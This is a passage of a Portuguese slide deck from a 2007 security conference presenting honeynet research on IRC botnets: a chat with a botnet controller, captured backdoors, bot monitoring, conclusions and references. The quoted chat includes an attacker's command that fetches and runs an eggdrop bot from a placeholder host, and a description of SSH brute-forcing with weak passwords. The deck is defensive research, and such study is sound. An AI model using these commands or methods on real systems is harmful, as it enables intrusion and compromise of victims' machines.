dados para autenticação no canal, mas o
botclient não foi executado => anti-vírus!
61. 27/10/2007 GTS 2007
Cheating the Cheater II
[CC] ok ..let's try to put an eggdrop in here
[CC] ftp -nvdA <Site_CC>
[CC] get windrop.rar
[CC] unrar that ..and then @eggdrop.exe
[Eu] this box is USELESS!!!
(...)
[Eu] what ssh brute force you use?
[CC] unixcod
[CC] first tries to scan a range for port 22
[CC] then makes a list with the ip's
(...)
[CC] from waht I saw ..like user:user ..or user:user123 ori user:123456
[CC] HOW TO SET A PASSWORD LIKE THAT ?
62. 27/10/2007 GTS 2007
Troféus - I
• Miro backdoor: binário para Linux
– USAGE: miro [PORT=1230]
• .-= Backdoor made by Mironov =-.
– VirusTotal: File miro received on 10.25.2007
15:28:05 (CET) Result: 22/32 (68.75%)
• Backdoor.Linux.Small.q (10/22)
• O bot que “contaminou” o honeypot Linux:
– EnergyMech + Arquivos de configuração dos bots
com informações dos canais mantidos pelo CC e
nicks.
63. 27/10/2007 GTS 2007
Monitoração
• Foi desenvolvido um bot de monitoração,
utilizando GeoIP (botLocator).
• Em um dos dias de chat:
– Período: 1 hora;
– Qtde. bots no canal monitorado: 39
– Interações E/S de bots: 7
• Localização geográfica do provedor do botclient;
• “Máscara” para ocultar a origem de alguns bots.
65. 27/10/2007 GTS 2007
Considerações
• Os zumbis de uma botnet são bastante
voláteis:
– Hosts vulneráveis podem ser contaminados
por outros malware e ocorrer um crash...
– Alguns bots causam instabilidade na vítima,
sendo rapidamente detectados.
• O modo de contagem de bots não é
preciso => observou-se que o CC trocava
constantemente os nicks de seus bots.
66. 27/10/2007 GTS 2007 66
Roteiro
• Introdução
• Botnets
• Honeynet CenPRA
• Metodologia de Análise
• Estudo de Caso
• Conclusão
67. 27/10/2007 GTS 2007 67
Conclusão
• Botnet é um problema para a segurança em TI
atualmente
• É preciso entender seu funcionamento para que
seja possível desenvolver técnicas de combate
ao problema
• A abordagem de análise apresentada mostra
como uma honeynet pode ser útil nessa tarefa
68. 27/10/2007 GTS 2007 68
Conclusão
• Metodologia desenvolvida:
– Ferramentas de software livre
– Ambiente isolado de análise
• Identificação de como os comandos são
fornecidos aos bots: tópicos de canais IRC
• Identificação do significado de cada comando e
respectivas ações tomadas pelo bot
69. 27/10/2007 GTS 2007 69
Perguntas?
OBRIGADO
Marcelo C. Sacchetin <msacchet@cenpra.gov.br>
André A. R. Grégio <argregio@cenpra.gov.br>
Antônio Montes <amontes@cenpra.gov.br>
70. 27/10/2007 GTS 2007 70
Referências
[1] Barbato, L. G. C. and Montes, A. (2004) "SMaRT: Resultados da Monitoração de
Atividades Hostis em uma Máquina Preparada para ser Comprometida" I
WorkComp Sul - Unisul - Universidade do Sul de Santa Catarina, Florianópolis,
May 2004.
[2] Dupoux, F. and Ladurelle, F. (2007) “partimage” http://www.partimage.org/Main_Page
[3] Ritter, J. (2007) "ngrep - network grep" http://ngrep.sourceforge.net
[4] SNORT (2007) “snort” http://www.snort.org (verified on March 2007)
[5] TCPDUMP (2007) “tcpdump” http://www.tcpdump.org (verified on March 2007)
[6] The Honeynet Project (2007) "Sebek" http://www.honeynet.org/tools/sebek
[7] UK Honeynet Project (2007) "Honeysnap"
http://www.ukhoneynet.org/tools/honeysnap
[8] Symantec http://www.symantec.com